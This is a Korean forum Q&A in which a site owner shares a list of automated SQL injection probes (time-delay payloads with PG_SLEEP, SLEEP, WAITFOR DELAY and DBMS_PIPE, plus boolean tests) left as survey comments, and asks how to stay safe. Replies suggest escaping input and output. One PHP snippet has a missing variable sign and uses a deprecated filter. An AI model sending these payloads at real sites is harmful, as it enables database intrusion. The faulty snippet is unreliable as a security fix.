디비인젝션 공격
본문
G MBWUpmEH 2023-07-23 04:59:21삭제
@@RRTki
G MBWUpmEH 2023-07-23 04:59:20삭제
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
G MBWUpmEH 2023-07-23 04:59:12삭제
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
G MBWUpmEH 2023-07-23 04:59:01삭제
mgXUgM0m')) OR 319=(SELECT 319 FROM PG_SLEEP(15))--
G MBWUpmEH 2023-07-23 04:58:45삭제
l21MgpwA') OR 673=(SELECT 673 FROM PG_SLEEP(15))--
G MBWUpmEH 2023-07-23 04:58:31삭제
3myT6qQC' OR 876=(SELECT 876 FROM PG_SLEEP(15))--
G MBWUpmEH 2023-07-23 04:58:20삭제
-1)) OR 430=(SELECT 430 FROM PG_SLEEP(15))--
G MBWUpmEH 2023-07-23 04:58:08삭제
-5) OR 243=(SELECT 243 FROM PG_SLEEP(15))--
G MBWUpmEH 2023-07-23 04:57:30삭제
-5 OR 393=(SELECT 393 FROM PG_SLEEP(15))--
G MBWUpmEH 2023-07-23 04:57:04삭제
jLC93o12'; waitfor delay '0:0:15' --
G MBWUpmEH 2023-07-23 04:56:40삭제
1 waitfor delay '0:0:15' --
G MBWUpmEH 2023-07-23 04:56:13삭제
-1); waitfor delay '0:0:15' --
G MBWUpmEH 2023-07-23 04:55:55삭제
-1; waitfor delay '0:0:15' --
G MBWUpmEH 2023-07-23 04:55:37삭제
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
G MBWUpmEH 2023-07-23 04:55:18삭제
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
G MBWUpmEH 2023-07-23 04:54:58삭제
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
G MBWUpmEH 2023-07-23 04:54:40삭제
if(now()=sysdate(),sleep(15),0)
G MBWUpmEH 2023-07-23 04:54:24삭제
-1" OR 2+462-462-1=0+0+0+1 --
G MBWUpmEH 2023-07-23 04:54:24삭제
-1' OR 2+276-276-1=0+0+0+1 or 'eI1jHuYI'='
G MBWUpmEH 2023-07-23 04:54:24삭제
-1' OR 2+493-493-1=0+0+0+1 --
G MBWUpmEH 2023-07-23 04:54:23삭제
-1 OR 2+537-537-1=0+0+0+1
G MBWUpmEH 2023-07-23 04:54:23삭제
-1 OR 2+650-650-1=0+0+0+1 --
----------------------------
설문조사를 오픈했놨더니 댓글에 이런 메세지가 가득하네요..
인젝션 공격이라는데... 패치 잘 되어 있으면 문제 없는 거죠...?
ㅠ.ㅠ
답변 3
SQL 인젝션인데 댓글에 그대로 INSERT 된 것을 보면 문제는 없을 가능성이 있구요.
댓글 입력 처리에 mysqli_real_escape_string(); 을 사용하고
혹시 모르니 사용자 댓글 출력 시 이스케이프 처리도 필요할 것 같습니다.
// 사용자 입력을 필터링하여 적절한 형식인지 확인
$comment = $_POST['comment'];
$comment = filter_var($comment, FILTER_SANITIZE_STRING);
// 데이터베이스로부터 가져온 변수 출력 시 HTML 이스케이프 적용
echo htmlspecialchars(comment, ENT_QUOTES, 'UTF-8');
넵 감사합니다. 위 코드는 어떤 파일에 적용을 해야 하는지요....?
@재회 사이트 URL을 쪽지로 보내주시면 보고 말씀드리겠습니다.
해당아이피가 어디서 등록되는지 보시고 막으시는걸 권유드립니다.
Accunetix 와 같은 전용 웹 공격 테스트 환경을 구축하고 테스트해보셔야 합니다.
Acunetix는 보통 10만개 이상의 공격패턴으로 공격하여 그 결과에 따라 위험도를 등급으로 표식하고, 그 해결방도를 제안해줍니다.
구체적인 내용을 알고싶으시면, 연계주세요.
위의 패턴은 이스케이프 조치만 하면 해결되는 거라서
현 상황에 Accunetix는 필요 없다고 생각됩니다.
그리고 댓글은 유료 의뢰에 해당하는 느낌을 지울 수 없네요.
QA에 맞는 내용을 적어주시기 바랍니다.
신고가 접수된 글입니다.
신고 횟수가 1회 이상이면 글을 확인하지 못합니다.
@swallow 연계 ㅋㅋㅋㅋㅋ 조선족이 슬금슬금 영업질이쥬
